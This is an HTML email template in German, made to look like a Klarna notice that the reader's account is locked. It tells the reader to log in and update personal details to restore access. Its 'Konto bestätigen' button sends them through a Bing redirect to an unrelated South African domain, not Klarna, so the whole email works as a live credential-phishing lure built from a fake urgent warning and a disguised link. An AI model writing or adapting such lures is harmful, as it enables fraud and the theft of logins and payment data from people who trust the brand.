<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>Klarna</title>
<style type="text/css">
    /* Reset */
    body, html {
        margin: 0 !important;
        padding: 0 !important;
        width: 100% !important;
        background-color: #f9f9f9 !important;
        font-family: Arial, Helvetica, sans-serif;
        color: #333333;
    }

    table, td {
        mso-table-lspace: 0pt !important;
        mso-table-rspace: 0pt !important;
    }

    img {
        -ms-interpolation-mode: bicubic;
        border: 0;
        height: auto;
        line-height: 100%;
        outline: none;
        text-decoration: none;
    }

    .email-container {
        max-width: 600px;
        width: 100%;
        margin: auto;
        background-color: #ffffff;
        border-radius: 8px;
        overflow: hidden;
        box-shadow: 0 0 8px rgba(0,0,0,0.05);
    }

    .header {
        background-color: #242222;
        padding: 25px 0;
        text-align: center;
    }

    .header-logo {
        display: inline-block;
        background-color: #ffb3d6;
        color: #000000;
        font-size: 22px;
        font-weight: bold;
        padding: 6px 12px;
        border-radius: 10px;
    }

    .content {
        padding: 30px 25px;
        line-height: 1.6;
        font-size: 16px;
    }

    h3 {
        color: #1a1a1a;
        margin-bottom: 15px;
    }

    .button {
        display: inline-block;
        background-color: #0c0c0c;
        color: #ffffff !important;
        font-weight: bold;
        font-size: 16px;
        padding: 12px 25px;
        text-decoration: none;
        border-radius: 25px;
        margin: 20px 0;
    }

    .divider {
        border-top: 1px solid #eeeeee;
        margin: 20px 0;
    }

    .small-text {
        font-size: 14px;
        color: #666666;
        line-height: 1.5;
    }

    .footer {
        text-align: center;
        font-size: 12px;
        color: #999999;
        padding: 20px;
        background-color: #f9f9f9;
    }

    @media screen and (max-width: 600px) {
        .content { padding: 20px !important; }
        .header-logo { font-size: 20px; padding: 5px 10px; }
    }
</style>
</head>

<body>
<table width="100%" cellpadding="0" cellspacing="0" border="0" bgcolor="#f9f9f9">
    <tr>
        <td align="center">
            <table class="email-container" cellpadding="0" cellspacing="0" border="0">
                <!-- Header -->
                <tr>
                    <td class="header">
                        <div class="header-logo">Klarna</div>
                    </td>
                </tr>

                <!-- Content -->
                <tr>
                    <td class="content">
                        <h3>Ihr Konto ist derzeit gesperrt</h3>
                        <p>Aus Sicherheitsgründen wurden einige Funktionen Ihres Kontos vorübergehend eingeschränkt, da Ihre Zahlungsmethode nicht mehr gültig ist. Derzeit können Sie Ihr Konto nicht nutzen.</p>

                        <div class="divider"></div>

                        <p><strong>So können Sie Ihr Konto reaktivieren:</strong></p>
                        <ul>
                            <li>Melden Sie sich bei Ihrem Konto an.</li>
                            <li>Überprüfen und aktualisieren Sie Ihre persönlichen Informationen, um Ihre Identität zu bestätigen und den Zugriff wiederherzustellen.</li>
                        </ul>

                        <div style="text-align:center;">
                            <a href="https://www.bing.com/ck/a?!&&p=b547d1108251fd7bb3e0228ad9417be3db5b87023b3c79199630aeacfabc445cJmltdHM9MTc2OTk5MDQwMA&ptn=3&ver=2&hsh=4&fclid=07133440-c5c2-62c1-089e-22b5c47c635e&psq=eurekasolutions.co.za&u=a1aHR0cHM6Ly93d3cuZXVyZWthc29sdXRpb25zLmNvLnphL3NlcnZpY2Uv" target="_blank" class="button">Konto bestätigen</a>
                            <p class="small-text"></p>
                            <p class="small-text">Durch Fortfahren akzeptieren Sie unsere <a href="#" style="color:#5f00b3; text-decoration:none;">Nutzungsbedingungen</a> und die <a href="#" style="color:#5f00b3; text-decoration:none;">Datenschutzrichtlinie</a>.</p>
                        </div>
                    </td>
                </tr>

                <!-- Footer -->
                <tr>
                    <td class="footer">
                        © 2026 Klarna Alle Rechte vorbehalten.
                    </td>
                </tr>
            </table>
        </td>
    </tr>
</table>
</body>
</html>